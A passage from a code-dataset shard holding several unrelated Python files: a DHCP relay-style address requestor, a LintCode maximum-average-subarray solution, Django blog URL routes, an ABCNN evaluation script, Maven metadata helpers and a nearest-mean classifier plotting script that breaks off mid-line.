ipaddress import IPv4Address, IPv4Network\n\nfrom odr.listeningsocket import ListeningSocket\nfrom odr.timeoutmgr import TimeoutManager, TimeoutObject\n\nfrom pydhcplib.dhcp_packet import DhcpPacket\n\n\nDHCP_SUBOPTION_LINKSEL = 5\nDHCP_SUBOPTION_LINKSEL_LEN = 4\n\n\nclass DhcpAddressRequest:\n \"\"\"Represents the request for an IP address (and additional settings\n relevant for the target network) based on a MAC address.\n\n To perform the above task, DHCP packets are sent and received. For each\n packet, the class pretends to be a DHCP relay so that all answers can be\n received and responded to, although the requested IP address is completely\n different from the one that the packets are received on.\n\n The DHCP requests are targeted at specific DHCP server IP addresses.\n\n As soon as the request has completed, has failed or has timed out, the\n apropriate call back handler is called.\n \"\"\"\n\n AR_DISCOVER = 1\n AR_REQUEST = 2\n\n def __init__(\n self,\n *,\n log: logging.Logger,\n requestor: \"DhcpAddressRequestor\",\n timeout_mgr: TimeoutManager,\n success_handler_clb: Callable[[Dict], None],\n failure_handler_clb: Callable[[], None],\n local_ip: str,\n client_identifier: str,\n server_ips: Iterable[str],\n target_addr: str = None,\n max_retries: int = 3,\n timeout: int = 4,\n lease_time: int = None\n ) -> None:\n \"\"\"Sets up the address request.\n\n Creates a new XID. Each address request has such a unique (randomly\n chosen) identifier.\n\n :ivar log: Instance of the logger for this class.\n :ivar requestor: Instance of the requestor, where the request is\n tracked and where the listening socket is maintained.\n :ivar timeout_mgr: Instance of the timeout manager.\n :ivar success_handler_clb: Call-back that is called as soon as the\n request has succeeded.\n :ivar failure_handler_clb: Call-back that is called as soon as the\n request has failed or timed out.\n :ivar local_ip: IP address from which all DHCP requests originate and\n on which the responses are received. Is used within the DHCP\n packets.\n :ivar client_identifier: The client identifier which will represent the\n client for which an IP address is requested.\n :ivar server_ips: A list of IP addresses to which the DHCP requests\n should be sent.\n :ivar target_addr: An address specifying the subnet to send the reqest\n for, which will be sent to the DHCP server using the link\n selection option descriped in RFC 3527\n :ivar max_retries: The maximum number of retries after timeouts.\n Defaults to 2 retries.\n :ivar timeout: Number of seconds to wait for a DHCP response before\n timing out and/or retrying the request. Defaults to 5 seconds.\n :ivar lease_time: DHCP lease time we would like to have. Defaults to\n None, meaning no specific lease time is requested.\n \"\"\"\n self._log = log\n self._requestor = requestor\n self._timeout_mgr = timeout_mgr\n self._success_handler = success_handler_clb\n self._failure_handler = failure_handler_clb\n self._local_ip = IPv4Address(local_ip)\n self._client_identifier = client_identifier.encode(\"utf-8\")\n self._server_ips = [IPv4Address(ip) for ip in server_ips]\n self._target_addr = IPv4Address(target_addr) if target_addr else None\n self._max_retries = max_retries\n self._initial_timeout = timeout\n self._lease_time = lease_time\n\n self._start_time = int(time.time())\n\n self._xid = random.randint(0, (2 ** 32) - 1)\n\n # Current packet state.\n self._state = None # type: Optional[int]\n\n # What's the current timeout? (Will be increased after each timeout\n # event.)\n self._timeout = self._initial_timeout\n # When will the packet time out?\n self._timeout_obj = None # type: Optional[TimeoutObject]\n # What was the contents of the last packet? (Used for retry.)\n self._last_packet = None # type: Optional[DhcpPacket]\n # Number of packet retries\n self._packet_retries = 0\n\n def __del__(self) -> None:\n self._log.debug('xid %d destroyed', self.xid)\n\n @property\n def xid(self) -> int:\n \"\"\":returns: the unique identifier of the DHCP request.\n \"\"\"\n return self._xid\n\n def _generate_base_packet(self) -> DhcpPacket:\n packet = DhcpPacket()\n packet.AddLine(\"op: BOOTREQUEST\")\n packet.AddLine(\"htype: 1\")\n packet.SetOption(\"xid\", self._xid.to_bytes(4, \"big\"))\n\n # We're the gateway.\n packet.SetOption(\"giaddr\", self._local_ip.packed)\n\n if self._target_addr:\n packet.SetOption(\n \"relay_agent\",\n bytes((DHCP_SUBOPTION_LINKSEL, DHCP_SUBOPTION_LINKSEL_LEN))\n + self._target_addr.packed,\n )\n\n # Request IP address, etc. for the following client identifier.\n packet.SetOption(\"client_identifier\", self._client_identifier)\n\n # We pretend to be a gateway, so the packet hop count is > 0 here.\n packet.AddLine(\"hops: 1\")\n\n return packet\n\n def _add_option_list(self, packet: DhcpPacket) -> None:\n # 'classless_static_route' must be requested before 'router'.\n packet.AddLine(\n \"parameter_request_list: subnet_mask,\"\n \"classless_static_route,router,\"\n \"domain_name_server,domain_name,renewal_time_value,\"\n \"rebinding_time_value\"\n )\n\n def _set_lease_time(self, packet: DhcpPacket) -> None:\n if self._lease_time is None:\n return\n packet.SetOption('ip_address_lease_time', self._lease_time.to_bytes(4, \"big\"))\n\n def _retrieve_server_ip(self, packet: DhcpPacket) -> None:\n \"\"\"In case we're sending the requests to more than one DHCP server,\n attempt to determine which DHCP server answered, so that we can restrict\n our future requests to only one server.\n \"\"\"\n if len(self._server_ips) > 1:\n self._log.debug(\"Attempting to find server ip\")\n try:\n self._server_ips = [IPv4Address(packet.GetOption('server_identifier'))]\n except Exception:\n self._log.exception(\"invalid server ip response\")\n else:\n # We were able to determine a single DHCP server with which we\n # will communicate from now on.\n self._log.debug(\"Found server ip %s\", self._server_ips[0])\n\n def _send_packet(self, packet: DhcpPacket) -> None:\n \"\"\"Method to initially send a packet.\n \"\"\"\n self._last_packet = packet\n self._packet_retries = 0\n self._timeout = self._initial_timeout\n self._send_to_server(packet)\n\n def _resend_packet(self) -> None:\n \"\"\"Method to re-send the packet that was sent last.\n \"\"\"\n assert self._last_packet is not None\n self._packet_retries += 1\n self._timeout *= 2\n self._send_to_server(self._last_packet)\n\n def _send_to_server(self, packet: DhcpPacket) -> None:\n \"\"\"Method that does the actual packet sending. The packet is sent once\n for each DHCP server destination.\n \"\"\"\n randomised_timeout = self._timeout + random.uniform(-1, 1)\n self._log.debug('timeout for xid %d is %ds', self.xid, randomised_timeout)\n timeout_time = time.time() + randomised_timeout\n self._timeout_obj = TimeoutObject(timeout_time, self.handle_timeout)\n self._timeout_mgr.add_timeout_object(self._timeout_obj)\n for server_ip in self._server_ips:\n self._log.debug(\n \"Sending packet in state %s to %s [%d/%d]\",\n self._state,\n server_ip,\n self._packet_retries + 1,\n self._max_retries + 1,\n )\n self._requestor.send_packet(packet, str(server_ip), 67)\n\n def _valid_source_address(self, packet: DhcpPacket) -> bool:\n if not packet.source_address:\n return False\n ip_address_str, port = packet.source_address # type: (str, int)\n ip_address = IPv4Address(ip_address_str)\n if port != 67:\n self._log.debug(\n \"dropping packet from wrong port: %s:%d\", packet.source_address, port\n )\n return False\n if ip_address not in self._server_ips:\n self._log.debug(\n \"dropping packet from wrong IP address: %s:%d\",\n packet.source_address,\n port,\n )\n return False\n return True\n\n def handle_dhcp_offer(self, offer_packet: DhcpPacket) -> None:\n \"\"\"Called by the requestor as soon as a DHCP OFFER packet is received\n for our XID.\n\n In case the packet matches what we currently expect, the packet is\n parsed and a matching DHCP REQUEST packet is generated.\n \"\"\"\n if self._state != self.AR_DISCOVER:\n self._log.debug(\"received unsolicited offer\")\n return\n self._log.debug(\"Received offer\")\n if not self._valid_source_address(offer_packet):\n return\n if self._timeout_obj:\n self._timeout_mgr.del_timeout_object(self._timeout_obj)\n req_packet = self._generate_request(offer_packet)\n self._retrieve_server_ip(req_packet)\n self._state = self.AR_REQUEST\n self._send_packet(req_packet)\n\n def handle_dhcp_ack(self, packet: DhcpPacket) -> None:\n \"\"\"Called by the requestor as soon as a DHCP ACK packet is received for\n our XID.\n\n In case the packet matches what we currently expect, the packet is\n parsed and the success handler called.\n\n The request instance (self) is removed from the requestor and will\n therefore be destroyed soon.\n \"\"\"\n if self._state != self.AR_REQUEST:\n return\n self._log.debug(\"Received ACK\")\n if not self._valid_source_address(packet):\n return\n if self._timeout_obj:\n self._timeout_mgr.del_timeout_object(self._timeout_obj)\n self._requestor.del_request(self)\n result = {} # type: Dict[str, Any]\n result['domain'] = packet.GetOption('domain_name').decode(\"ascii\")\n\n translate_ips = {\n 'yiaddr': 'ip_address',\n 'subnet_mask': 'subnet_mask',\n 'router': 'gateway',\n }\n for opt_name in translate_ips:\n if not packet.IsOption(opt_name):\n continue\n val = packet.GetOption(opt_name)\n if len(val) == 4:\n result[translate_ips[opt_name]] = str(IPv4Address(val))\n\n dns = [] # type: List[str]\n result['dns'] = dns\n dns_list = packet.GetOption('domain_name_server')\n while len(dns_list) >= 4:\n dns.append(str(IPv4Address(dns_list[:4])))\n dns_list = dns_list[4:]\n\n if packet.IsOption('classless_static_route'):\n static_routes = parse_classless_static_routes(\n list(packet.GetOption('classless_static_route'))\n )\n if static_routes is not None:\n if 'gateway' in result:\n # We MUST ignore a regular default route if static routes\n # are sent.\n del result['gateway']\n # Find and filter out default route (if any). And set it as\n # the new gateway parameter.\n result['static_routes'] = []\n for network, netmask, gateway in static_routes:\n if network == '0.0.0.0' and netmask == '0.0.0.0':\n result['gateway'] = gateway\n else:\n result['static_routes'].append((network, netmask, gateway))\n del static_routes\n\n # Calculate lease timeouts (with RFC T1/T2 if not found in packet)\n lease_delta = int.from_bytes(packet.GetOption('ip_address_lease_time'), \"big\")\n result['lease_timeout'] = self._start_time + lease_delta\n if packet.IsOption('renewal_time_value'):\n renewal_delta = int.from_bytes(\n packet.GetOption('renewal_time_value'), \"big\"\n )\n else:\n renewal_delta = int(lease_delta * 0.5) + random.randint(-5, 5)\n result['renewal_timeout'] = self._start_time + renewal_delta\n if packet.IsOption('rebinding_time_value'):\n rebinding_delta = int.from_bytes(\n packet.GetOption('rebinding_time_value'), \"big\"\n )\n else:\n rebinding_delta = int(lease_delta * 0.875) + random.randint(-5, 5)\n result['rebinding_timeout'] = self._start_time + rebinding_delta\n\n self._success_handler(result)\n\n def handle_dhcp_nack(self, packet: DhcpPacket) -> None:\n \"\"\"Called by the requestor as soon as a DHCP NACK packet is received for\n our XID.\n\n In case the packet matches what we currently expect, the failure handler\n is called.\n\n The request instance (self) is removed from the requestor and will\n therefore be destroyed soon.\n \"\"\"\n if self._state != self.AR_REQUEST:\n return\n self._log.debug(\"Received NACK\")\n if not self._valid_source_address(packet):\n return\n if self._timeout_obj:\n self._timeout_mgr.del_timeout_object(self._timeout_obj)\n self._requestor.del_request(self)\n self._failure_handler()\n\n def handle_timeout(self) -> None:\n \"\"\"Called in case the timeout_time has passed without a proper DHCP\n response. Handles resend attempts up to a certain maximum number of\n retries.\n\n In case the maximum number of retries have been attempted, the failure\n handler is called. Additionally, the request instance (self) is removed\n from the requestor and will therefore be destroyed soon.\n \"\"\"\n self._log.debug(\"handling timeout for %d\", self.xid)\n if self._packet_retries >= self._max_retries:\n self._requestor.del_request(self)\n self._log.debug(\"Timeout for reply to packet in state %s\", self._state)\n self._failure_handler()\n elif self._last_packet is not None:\n self._resend_packet()\n\n def _generate_request(self, offer_packet: DhcpPacket) -> DhcpPacket:\n \"\"\"Generates a DHCP REQUEST packet.\n \"\"\"\n raise NotImplementedError('Method _generate_request not implemented')\n\n\nclass DhcpAddressInitialRequest(DhcpAddressRequest):\n \"\"\"\n \"\"\"\n\n def __init__(self, **kwargs) -> None:\n \"\"\"Sets up the initial address request.\n\n See :meth:`DhcpAddressRequest.__init__` for further parameters.\n \"\"\"\n DhcpAddressRequest.__init__(\n self, log=logging.getLogger('dhcpaddrinitreq'), **kwargs\n )\n\n self._log.debug('initial request with xid %d created', self.xid)\n self._state = self.AR_DISCOVER\n\n self._requestor.add_request(self)\n self._send_packet(self._generate_discover())\n\n def _generate_discover(self) -> DhcpPacket:\n \"\"\"Generates a DHCP DISCOVER packet.\n \"\"\"\n packet = self._generate_base_packet()\n packet.AddLine(\"dhcp_message_type: DHCP_DISCOVER\")\n self._add_option_list(packet)\n self._set_lease_time(packet)\n return packet\n\n def _generate_request(self, offer_packet: DhcpPacket) -> DhcpPacket:\n \"\"\"Generates a DHCP REQUEST packet.\n \"\"\"\n packet = self._generate_base_packet()\n packet.AddLine(\"dhcp_message_type: DHCP_REQUEST\")\n self._add_option_list(packet)\n self._set_lease_time(packet)\n for opt in [\"server_identifier\"]:\n packet.SetOption(opt, offer_packet.GetOption(opt))\n packet.SetOption(\"request_ip_address\", offer_packet.GetOption(\"yiaddr\"))\n return packet\n\n\nclass DhcpAddressRefreshRequest(DhcpAddressRequest):\n \"\"\"\n \"\"\"\n\n def __init__(self, client_ip: str, **kwargs) -> None:\n \"\"\"Sets up the address request.\n\n See :meth:`DhcpAddressRequest.__init__` for further parameters.\n \"\"\"\n super().__init__(log=logging.getLogger('dhcpaddrrefreshreq'), **kwargs)\n\n self._client_ip = IPv4Address(client_ip)\n self._log.debug('refresh request with xid %d created', self.xid)\n\n self._state = self.AR_REQUEST\n\n self._requestor.add_request(self)\n self._send_packet(self._generate_refresh_request())\n\n def _generate_refresh_request(self) -> DhcpPacket:\n \"\"\"Generates a DHCP REQUEST packet.\n \"\"\"\n packet = self._generate_base_packet()\n packet.AddLine(\"dhcp_message_type: DHCP_REQUEST\")\n self._add_option_list(packet)\n self._set_lease_time(packet)\n packet.SetOption(\"request_ip_address\", self._client_ip.packed)\n return packet\n\n\nclass DhcpAddressRequestor(ListeningSocket):\n \"\"\"A DhcpAddressRequestor instance represents a UDP socket listening for\n DHCP responses on a specific IP address and port on a specific network\n device.\n\n Specific requests are added to a requestor instance and use the requestor\n to send DHCP requests. The requestor maps DHCP responses back to a specific\n request via the request's XID.\n\n Provides attribute listen_device, listen_address (through its super-class\n ListeningSocket) and add_request method for use by the requestor manager.\n\n Provides socket (through its super-class ListeningSocket) and handle_socket\n for use by the socket loop.\n \"\"\"\n\n # Maps dhcp_message_type to a request's message type handler.\n _DHCP_TYPE_HANDLERS = {\n 2: 'handle_dhcp_offer',\n 5: 'handle_dhcp_ack',\n 6: 'handle_dhcp_nack',\n }\n\n def __init__(\n self, listen_address: str = '', listen_port: int = 67, listen_device: str = None\n ) -> None:\n \"\"\"\\\n :ivar listen_address: IP address as string to listen on.\n :ivar listen_port: Local DHCP listening port. Defaults to 67.\n :ivar listen_device: Device name to bind to.\n \"\"\"\n self._log = logging.getLogger('dhcpaddrrequestor')\n self._requests = {} # type: Dict[int, DhcpAddressRequest]\n\n super().__init__(listen_address, listen_port, listen_device)\n\n self._log.debug(\n 'listening on %s:%d@%s for DHCP responses',\n self.listen_address,\n self.listen_port,\n self.listen_device,\n )\n\n def add_request(self, request: DhcpAddressRequest) -> None:\n \"\"\"Adds a new DHCP address request to this requestor.\n\n :ivar request: The request that should be added.\n \"\"\"\n self._log.debug(\"adding xid %d\", request.xid)\n self._requests[request.xid] = request\n\n def del_request(self, request: DhcpAddressRequest) -> None:\n \"\"\"Removes a DHCP address request that was previously added.\n\n :ivar request: The request that should be removed.\n \"\"\"\n self._log.debug(\"deleting xid %d\", request.xid)\n del self._requests[request.xid]\n\n def handle_socket(self) -> None:\n \"\"\"Retrieves the next, waiting DHCP packet, parses it and calls the\n handler of the associated request.\n \"\"\"\n try:\n data, source_address = self._socket.recvfrom(2048)\n if len(data) == 0:\n self._log.warning(\"unexpectedly received EOF!\")\n return\n packet = DhcpPacket()\n packet.source_address = source_address\n packet.DecodePacket(data)\n\n if (not packet.IsDhcpPacket()) or (\n not packet.IsOption(\"dhcp_message_type\")\n ):\n self._log.debug(\"Ignoring invalid packet\")\n return\n\n dhcp_type = packet.GetOption(\"dhcp_message_type\")[0]\n if dhcp_type not in self._DHCP_TYPE_HANDLERS:\n self._log.debug(\"Ignoring packet of unexpected DHCP type %d\", dhcp_type)\n return\n\n xid = int.from_bytes(packet.GetOption('xid'), \"big\")\n if xid not in self._requests:\n self._log.debug(\"Ignoring answer with xid %r\", xid)\n return\n\n request = self._requests[xid]\n clb_name = self._DHCP_TYPE_HANDLERS[dhcp_type]\n if not hasattr(request, clb_name):\n self._log.error(\"request has no callback '%s'\", clb_name)\n return\n\n clb = getattr(request, clb_name)\n clb(packet)\n except Exception:\n self._log.exception('handling DHCP packet failed')\n\n def send_packet(self, packet: DhcpPacket, dest_ip: str, dest_port: int) -> None:\n data = packet.EncodePacket()\n self.socket.sendto(data, (dest_ip, dest_port))\n\n\nclass DhcpAddressRequestorManager:\n \"\"\"Holds a list of all available requestors. Not much more than a\n dictionary with added error detection.\n \"\"\"\n\n def __init__(self) -> None:\n self._requestors_by_device_and_ip = (\n {}\n ) # type: Dict[Tuple[Optional[str], str], DhcpAddressRequestor]\n self._log = logging.getLogger('dhcpaddrrequestormgr')\n\n def add_requestor(self, requestor: DhcpAddressRequestor) -> None:\n \"\"\"\n :ivar requestor: Instance of a requestor that should be added to\n the list of known requestors.\n \"\"\"\n listen_pair = (requestor.listen_device, requestor.listen_address)\n if listen_pair in self._requestors_by_device_and_ip:\n self._log.error(\n 'attempt to listen on IP %s@%s multiple times',\n requestor.listen_address,\n requestor.listen_device,\n )\n return\n self._requestors_by_device_and_ip[listen_pair] = requestor\n\n def has_requestor(self, device: str, local_ip: str) -> bool:\n \"\"\":returns: True if the device and local_ip already has a requestor.\n \"\"\"\n return (device, local_ip) in self._requestors_by_device_and_ip\n\n def get_requestor(\n self, device: str, local_ip: str\n ) -> Optional[DhcpAddressRequestor]:\n \"\"\"\n :returns: the requestor matching the device and local_ip, or\n None in case there is none.\n \"\"\"\n listen_pair = (device, local_ip)\n if listen_pair not in self._requestors_by_device_and_ip:\n self._log.error('request for unsupported local IP %s@%s', local_ip, device)\n return None\n return self._requestors_by_device_and_ip[listen_pair]\n\n\ndef parse_classless_static_routes(\n data: List[int],\n) -> Optional[List[Tuple[str, str, str]]]:\n \"\"\"Parses an array of ints, representing classless static routes according\n to RFC 3442, into a list of tuples with full IP addresses.\n\n :returns: a tuple consisting of network, netmask and router.\n \"\"\"\n routes = []\n remaining = data[:]\n while len(remaining) >= 5:\n mask_width = remaining.pop(0)\n\n significant_octets = (mask_width - 1) // 8 + 1\n if significant_octets > 4:\n # Invalid number of octets.\n return None\n\n network_addr = bytes(remaining[:significant_octets]).ljust(4, b\"\\x00\")\n remaining = remaining[significant_octets:]\n\n network = IPv4Network((network_addr, mask_width))\n\n gateway = bytes(remaining[:4])\n remaining = remaining[4:]\n\n if len(gateway) != 4:\n # List too short, malformed gateway.\n return None\n routes.append(\n (\n str(network.network_address),\n str(network.netmask),\n str(IPv4Address(gateway)),\n )\n )\n\n if len(remaining) > 0:\n # Failed to properly parse the option.\n return None\n return routes\n","sub_path":"odr/dhcprequestor.py","file_name":"dhcprequestor.py","file_ext":"py","file_size_in_byte":25062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"413785631","text":"\"\"\" 617. Maximum Average Subarray II\nDescription\nGiven an array with positive and negative numbers, find the maximum average subarray which length \nshould be greater or equal to given length k.\n\nIt's guaranteed that the size of the array is greater or equal to k.\n\nExample\nGiven nums = [1, 12, -5, -6, 50, 3], k = 3\n\nReturn 15.667 // (-6 + 50 + 3) / 3 = 15.667\n \"\"\"\n\n\nclass Solution:\n \"\"\"\n @param nums: an array with positive and negative numbers\n @param k: an integer\n @return: the maximum average\n \"\"\"\n\n def maxAverage(self, nums, k):\n # write your code here\n start, end = min(nums), max(nums)\n while start + 1e-5 < end:\n mid = (start+end) / 2\n if self.check_subarray(nums, k, mid):\n start = mid\n else:\n end = mid\n return start\n\n def has_bigger_avg(self, nums, k, avg):\n \"\"\" \n TLE at 93% \"\"\"\n prefix_sum = [0 for _ in range(len(nums)+1)]\n for i in range(1, len(nums)+1):\n prefix_sum[i] = prefix_sum[i-1] + nums[i-1] - avg\n\n min_prefix_sum = 0\n for i in range(k, len(nums)+1):\n if prefix_sum[i] - min_prefix_sum >= 0:\n return True\n min_prefix_sum = min(min_prefix_sum, prefix_sum[i-k+1])\n return False\n\n def check_subarray(self, nums, k, average):\n prefix_sum = [0]\n for num in nums:\n prefix_sum.append(prefix_sum[-1] + num - average)\n\n min_prefix_sum = 0\n for i in range(k, len(nums) + 1):\n if prefix_sum[i] - min_prefix_sum >= 0:\n return True\n min_prefix_sum = min(min_prefix_sum, prefix_sum[i - k + 1])\n\n return False\n\n\ndef main():\n nums = [1, 12, -5, -6, 50, 3]\n k = 3\n ans = Solution().maxAverage(nums, k)\n print(ans)\n\n\nmain()\n","sub_path":"lint-617-maximum-average-subarray-ii/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"34426296","text":"from django.urls import path\n\nfrom .views import *\n\nurlpatterns = [\n path('', PostsListView.as_view(), name='posts_list_url'),\n path('post/create/', PostCreateView.as_view(), name='post_create_url'),\n path('post//', PostDetailView.as_view(), name='post_detail_url'),\n path('post//update/', PostUpdateView.as_view(), name='post_update_url'),\n path('post//delete/', PostDeleteView.as_view(), name='post_delete_url'),\n path('tags/', TagsListView.as_view(), name='tags_list_url'),\n path('tag/create/', TagCreateView.as_view(), name='tag_create_url'),\n path('tag//', TagDetailView.as_view(), name='tag_detail_url'),\n path('tag//update/', TagUpdateView.as_view(), name='tag_update_url'),\n path('tag//delete/', TagDeleteView.as_view(), name='tag_delete_url'),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"603136034","text":"import tensorflow as tf\nimport sys\nimport numpy as np\n\nfrom preprocess import Word2Vec, MSRP, WikiQA\nfrom ABCNN import ABCNN\n\n\ndef test(w, l2_reg, data_type, max_len, model_type, model_path, word2vec, num_classes=2):\n if data_type == \"WikiQA\":\n test_data = WikiQA(word2vec=word2vec, max_len=max_len)\n else:\n test_data = MSRP(word2vec=word2vec, max_len=max_len)\n\n test_data.open_file(mode=\"test\")\n\n model = ABCNN(s=max_len, w=w, l2_reg=l2_reg, model_type=model_type,\n num_features=test_data.num_features, num_classes=num_classes)\n\n print(\"=\" * 50)\n print(\"test data size:\", test_data.data_size)\n\n # Due to GTX 970 memory issues\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.7)\n\n with tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)) as sess:\n saver = tf.train.Saver()\n saver.restore(sess, model_path)\n print(model_path, \"Model restored.\")\n\n QA_pairs = {}\n s1s, s2s, labels, features = test_data.next_batch(batch_size=test_data.data_size)\n\n for i in range(test_data.data_size):\n pred = sess.run(model.prediction, feed_dict={model.x1: np.expand_dims(s1s[i], axis=0),\n model.x2: np.expand_dims(s2s[i], axis=0),\n model.y: np.expand_dims(labels[i], axis=0),\n model.features: np.expand_dims(features[i], axis=0)})\n\n s1 = \" \".join(test_data.s1s[i])\n s2 = \" \".join(test_data.s2s[i])\n\n if s1 in QA_pairs:\n QA_pairs[s1].append((s2, labels[i], np.asscalar(pred)))\n else:\n QA_pairs[s1] = [(s2, labels[i], np.asscalar(pred))]\n\n # Calculate MAP and MRR for comparing performance\n MAP, MRR = 0, 0\n for s1 in QA_pairs.keys():\n QA_pairs[s1] = sorted(QA_pairs[s1], key=lambda x: x[-1], reverse=True)\n\n for idx, (s2, label, prob) in enumerate(QA_pairs[s1]):\n if label == 1:\n MRR += 1 / (idx + 1)\n break\n\n for s1 in QA_pairs.keys():\n p, AP = 0, 0\n for idx, (s2, label, prob) in enumerate(QA_pairs[s1]):\n if label == 1:\n p += 1\n AP += p / (idx + 1)\n\n AP /= p\n MAP += AP\n\n num_questions = len(QA_pairs.keys())\n MAP /= num_questions\n MRR /= num_questions\n\n print(\"MAP:\", MAP, \"MRR:\", MRR)\n\n\nif __name__ == \"__main__\":\n\n # Paramters\n # --ws: window_size\n # --l2_reg: l2_reg modifier\n # --data_type: MSRP or WikiQA data\n # --max_len: max sentence length\n # --model_type: model type\n # --model_path: path of saved model\n\n # default parameters\n params = {\n \"ws\": 4,\n \"l2_reg\": 0.0004,\n \"data_type\": \"WikiQA\",\n \"max_len\": 40,\n \"model_type\": \"ABCNN1\",\n \"model_path\": \"./models/WikiQA-ABCNN1-20\",\n \"word2vec\": Word2Vec(),\n }\n\n if len(sys.argv) > 1:\n for arg in sys.argv[1:]:\n k = arg.split(\"=\")[0][2:]\n v = arg.split(\"=\")[1]\n params[k] = v\n\n test(w=int(params[\"ws\"]), l2_reg=float(params[\"l2_reg\"]),\n data_type=params[\"data_type\"], max_len=int(params[\"max_len\"]),\n model_type=params[\"model_type\"], model_path=params[\"model_path\"], word2vec=params[\"word2vec\"])\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"215240338","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/dsupplee/dev/apis-client-generator/src/googleapis/codegen/utilities/maven_utils.py\n# Compiled at: 2019-01-24 16:56:47\n\"\"\"Maven-related utilities for java packages.\"\"\"\nimport re\n\ndef GetMavenArtifactId(api_name, package_path='', canonical_name='', owner_domain='google.com'):\n \"\"\"Returns the maven artifact id for a given api.\n\n Args:\n api_name: (str) The api name.\n package_path: (str|None) The package path, if any.\n canonical_name: (str|None) The canonical api name, if any.\n owner_domain: (str) The api's owner domain.\n Returns:\n (str) The artifact id.\n \"\"\"\n if package_path and canonical_name:\n api_name = canonical_name.lower().replace(' ', '')\n parts = []\n if owner_domain == 'google.com':\n parts.extend(['google', 'api', 'services'])\n if package_path:\n parts.extend(re.split('\\\\.|/', package_path))\n parts.append(api_name)\n return ('-').join(parts)\n\n\ndef GetMavenGroupId(owner_domain):\n \"\"\"Returns the maven group id for a given owner domain.\n\n Args:\n owner_domain: (str) The owner domain.\n Returns:\n (str) The group id.\n \"\"\"\n if owner_domain == 'google.com':\n return 'com.google.apis'\n else:\n return ('.').join(reversed(owner_domain.split('.')))\n\n\ndef GetMavenVersion(api, language_version):\n \"\"\"Returns the maven version.\"\"\"\n if api.get('ownerDomain') == 'google.com':\n return '%s-rev%s-%s' % (api['version'],\n api['revision'],\n language_version)\n return '%s-%s-SNAPSHOT' % (api['version'], language_version)\n\n\ndef GetMavenMetadata(api, language_version):\n \"\"\"Returns a dict of useful maven metadata.\"\"\"\n owner_domain = api.get('ownerDomain', 'google.com')\n return {'artifact_id': GetMavenArtifactId(api['name'], api.get('packagePath'), api.get('canonicalName'), owner_domain), \n 'group_id': GetMavenGroupId(owner_domain), \n 'version': GetMavenVersion(api, language_version)}","sub_path":"pycfiles/google_apis_client_generator-1.7.0-py2-none-any/maven_utils.py","file_name":"maven_utils.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"464536771","text":"#question(a) synthetic1\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nfrom scipy.spatial.distance import cdist\n\ntraining = np.loadtxt(open(\"synthetic1_train.csv\"), delimiter=\",\")\n\nlabel_train = training[:,2]\nX1mean=np.sum(training[label_train==1,0])/np.count_nonzero(label_train==1)\nY1mean=np.sum(training[label_train==1,1])/np.count_nonzero(label_train==1)\nprint('In synthetic1_train,class1 Xmean is ',(X1mean))\nprint('In synthetic1_train,class1 Ymean is ',(Y1mean))\nplt.scatter(training[label_train==1,0],training[label_train==1,1],marker=\"^\",label=\"class1\")\nplt.scatter(X1mean,Y1mean,marker=\"x\",label=\"class1 mean\")\n\n\nX2mean=np.sum(training[label_train==2,0])/np.count_nonzero(label_train==2)\nY2mean=np.sum(training[label_train==2,1])/np.count_nonzero(label_train==2)\nprint('In synthetic1_train,class2 Xmean is ',(X2mean))\nprint('In synthetic1_train,class2 Ymean is ',(Y2mean))\nplt.scatter(training[label_train==2,0],training[label_train==2,1],marker=\"o\",c=\"r\",label=\"class2\")\nplt.scatter(X2mean,Y2mean,marker=(5, 2),c=\"g\",label=\"class2 mean\")\nplt.legend(loc='lower right')\nsample_mean=([X1mean,Y1mean],[X2mean,Y2mean])\nplt.show()\n\n\n#def plotDecBoundaries(training, label_train, sample_mean):\n\n\n\nnclass = max(np.unique(label_train))\n\n# Set the feature range for ploting\nmax_x = np.ceil(max(training[:, 0])) + 1\nmin_x = np.floor(min(training[:, 0])) - 1\nmax_y = np.ceil(max(training[:, 1])) + 1\nmin_y = np.floor(min(training[:, 1])) - 1\n\nxrange = (min_x, max_x)\nyrange = (min_y, max_y)\n\n# step size for how finely you want to visualize the decision boundary.\ninc = 0.005\n\n# generate grid coordinates. this will be the basis of the decision\n# boundary visualization.\n(x, y) = np.meshgrid(np.arange(xrange[0], xrange[1] + inc / 100, inc), np.arange(yrange[0], yrange[1] + inc / 100, inc))\n\n# size of the (x, y) image, which will also be the size of the\n# decision boundary image that is used as the plot background.\nimage_size = x.shape\nxy = np.hstack((x.reshape(x.shape[0] * x.shape[1], 1, order='F'),\n y.reshape(y.shape[0] * y.shape[1], 1, order='F'))) # make (x,y) pairs as a bunch of row vectors.\n\n# distance measure evaluations for each (x,y) pair.\ndist_mat = cdist(xy, sample_mean)\npred_label = np.argmin(dist_mat, axis=1)\n\n# reshape the idx (which contains the class label) into an image.\ndecisionmap = pred_label.reshape(image_size, order='F')\n\n# show the image, give each coordinate a color according to its class label\nplt.imshow(decisionmap, extent=[xrange[0], xrange[1], yrange[0], yrange[1]], origin='lower')\n\n# plot the class training data.\nplt.plot(training[label_train == 1, 0], training[label_train == 1, 1], 'rx')\nplt.plot(training[label_train == 2, 0], training[label_train == 2, 1], 'go')\nif nclass == 3:\n plt.plot(training[label_train == 3, 0], training[label_train == 3, 1], 'b*')\n\n# include legend for training data\nif nclass == 3:\n l = plt.legend(('Class 1', 'Class 2', 'Class 3'), loc=2)\nelse:\n l = plt.legend(('Class 1', 'Class 2'), loc=2)\nplt.gca().add_artist(l)\n\n# plot the class mean vector.\nm1, = 